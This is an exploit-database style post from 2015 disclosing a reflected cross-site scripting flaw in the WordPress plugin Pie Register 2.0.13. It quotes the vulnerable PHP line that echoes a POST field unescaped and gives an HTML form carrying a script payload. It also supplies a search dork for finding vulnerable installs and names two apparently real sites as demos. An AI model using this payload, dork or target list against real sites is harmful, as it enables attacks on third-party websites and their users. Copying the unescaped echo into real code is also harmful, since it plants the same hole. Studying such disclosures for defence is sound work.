facebook facebook twitter rss

Wordpress plugin Pie Register 2.0.13 XSS

Author: NULLpOint7r , Published: 17-02-2015
# Exploit Title: Wordpress plugin Pie Register 2.0.13 XSS
# Exploit Author: NULLpOint7r
# Contact me: seidbenseidok@gmail.com
# Home: http://www.sec4ever.com/home/
# Date: 2015-02-16
# Dork: inurl:/wp-content/plugins/pie-register/
# Version: 2.0.13
# Download link: https://downloads.wordpress.org/plugin/pie-register.2.0.13.zip

vulnerable code [/menus/PieRegInvitationCodes.php]:
5. if(isset($_POST['notice']) && $_POST['notice'] ){
6. echo '<div id="message" class="updated fade"><p><strong>' . $_POST['notice'] . '.</strong></p></div>';
7. }
.....

exploit:

<form method="POST" action="http://127.0.0.1/wp-content/plugins/pie-register/menus/PieRegInvitationCodes.php">
<input type="text" name="notice" value="'><script>alert(/Owned by someone/)</script>">
<input type="submit" value="Send">
</form>

demo:
http://anthonyorio.com/
http://nigus.se/

Like us on Facebook :